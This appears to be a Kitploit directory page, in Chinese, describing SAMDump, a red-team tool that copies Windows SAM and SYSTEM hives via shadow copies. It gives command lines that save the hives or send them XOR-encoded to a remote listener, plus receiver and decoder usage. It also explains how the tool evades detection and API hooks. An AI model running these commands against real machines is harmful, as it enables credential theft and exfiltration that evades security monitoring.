Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/ricardojoserf/samdump
权限提升加密/解密工具数据泄露后渗透利用实用工具与框架红队
GitHubricardojoserf/samdump

SAMDump

提取 SAM 和 SYSTEM 配置单元,使用卷影复制(VSS)API。支持数据外传和 XOR 混淆选项。支持 C#、C++、Crystal、Python、Rust、Golang、Nim 和 Deno(JavaScript)语言。

查看仓库
37246510天前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
网站

SAMDump

使用卷影复制服务(VSS)提取 Windows SAM 和 SYSTEM 文件,支持多种渗出选项和 XOR 混淆:

  • 使用 VSS 列出卷影副本,并在必要时创建一个
  • 从卷影副本中提取 SAM 和 SYSTEM 文件
  • 使用 NT API 调用进行文件操作(NtCreateFile, NtReadFile, NtWriteFile)
  • 支持用于混淆的 XOR 编码
  • 渗出方式:本地保存或网络传输

它使用 C++、C#、Crystal 和 Python 实现,适用于现代 Windows 版本。

它需要提升权限,如果创建了卷影副本,该副本会在约 5 分钟后自动删除。


使用

root@kitploit:~
SAMDump.exe [OPTIONS]

Options:
  --save-local [BOOL]    Save locally (default: false)
  --output-dir DIR       Output directory (default: C:\Windows\tasks)
  --send-remote [BOOL]   Send remotely (default: false)
  --host IP              Host for remote sending (default: 127.0.0.1)
  --port PORT            Port for remote sending (default: 7777)
  --xor-encode [BOOL]    XOR Encode (default: false)
  --xor-key KEY          Enable XOR with specified key (default: SAMDump2025)
  --disk DISK            Disk for shadow copy (default: C:\)
  --help                 Show this help

无编码本地保存:

root@kitploit:~
SAMDump.exe --save-local --output-dir "C:\temp"

img1

使用 XOR 编码本地保存:

root@kitploit:~
SAMDump.exe --save-local --xor-encode --xor-key "SAMDump2025"

img2

使用 XOR 编码和默认密钥发送到远程服务器:

root@kitploit:~
SAMDump.exe --send-remote --host 192.168.1.72 --port 1234 --xor-encode

img3


接收文件的服务端

server.py 是一个 Python 服务端,通过网络接收文件,自动进行 XOR 解码并格式化文件名:

root@kitploit:~
python server.py [OPTIONS]

Options:
  --host HOST     IP address to listen on (default: 0.0.0.0)
  --port PORT     Port to listen on (default: 7777)
  --xor-key KEY   Key for XOR decoding (optional)

在指定接口和端口上监听并带 XOR 密钥:

root@kitploit:~
python server.py --host 192.168.1.72 --port 1234 --xor-key "SAMDump2025"

img4

文件名包含 IP 地址和日期,因此您可以从不同系统发送文件,实现自动化处理。


解码文件的脚本

xor-decoder.py 是一个 Python 脚本,用于本地解码 XOR 编码的 SAM 和 SYSTEM 文件:

root@kitploit:~
python xor-decoder.py [OPTIONS]

Options:
  --sam SAM         Path to encoded SAM file (required)
  --system SYSTEM   Path to encoded SYSTEM file (required)
  --xor-key KEY     XOR key for decoding (default: SAMDump2025)
  --output-dir DIR  Output directory for decoded files (default: ./decoded)

使用默认密钥解码:

root@kitploit:~
python xor-decoder.py --sam sam.txt --system system.txt

img5

使用自定义密钥和输出目录解码:

root@kitploit:~
python xor-decoder.py --sam sam.txt --system system.txt --xor-key "MyKey" --output-dir ./results

img6


实现语言

该项目包含用三种语言实现的版本:

  • C++:初始实现
  • C#:.NET 版本,便于移植
  • Python:需要安装 comtypes 库(pip install comtypes)

动机

我希望自动化这个过程,而且我遇到的大多数 Windows 系统都运行 VSS,但安全解决方案会检测使用 vssadmin 创建卷影副本和提取这些文件的行为,因为这是众所周知的技术。

该工具在使用远程传输模式时无需写入目标文件系统即可提取文件;XOR 编码提供基本的混淆功能,以规避基于签名的检测(即使在使用远程模式时也是如此)。

此外,它利用 NT API 调用来绕过某些监控和用户态 API 钩子。


NT API 集成

该工具使用 NT 系统调用而非标准 Windows API 函数,这可能会绕过一些通常被监控的用户态 API 钩子:

  • NtCreateFile 和 NtReadFile:用于打开句柄并读取卷影副本中 SAM 和 SYSTEM 文件的字节
  • NtWriteFile:用于将文件本地保存

致谢

感谢 @vx-underground 识别并建议对导出地址表(EAT)遍历代码进行优化,用直接指针访问替代不必要的 NtReadVirtualMemory 调用。

下载工具